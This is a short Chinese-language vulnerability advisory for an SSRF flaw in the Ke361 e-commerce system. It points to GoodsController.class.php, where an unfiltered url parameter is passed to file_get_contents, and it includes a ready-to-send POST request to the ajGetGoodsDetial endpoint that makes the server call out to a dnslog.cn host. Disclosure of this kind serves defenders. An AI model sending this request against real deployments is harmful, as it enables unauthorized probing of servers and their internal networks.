Ke361 GoodsController.class.php SSRF漏洞

漏洞描述

Ke361 GoodsController.class.php URL参数存在SSRF漏洞,通过漏洞可以获取敏感信息
 


 

漏洞影响

Ke361
 


 

环境生态

https://gitee.com/jcove/ke361
 


 

漏洞复现

存在漏洞的文件为Application/Home/Controller/GoodsController.class.php

图片[1]-Ke361 GoodsController.class.php SSRF漏洞-孤勇者社区

URL参数无过滤漏洞,file_get_contents函数,造成SSRF,构造请求

POST /index.php?s=/Goods/ajGetGoodsDetial
 
url=http://6si2gt.dnslog.cn

图片[2]-Ke361 GoodsController.class.php SSRF漏洞-孤勇者社区

dnslog 接收到请求

图片[3]-Ke361 GoodsController.class.php SSRF漏洞-孤勇者社区

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞5赞赏 分享
评论 共3条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像魔撒0
    • 头像场擦0
    • 头像及张0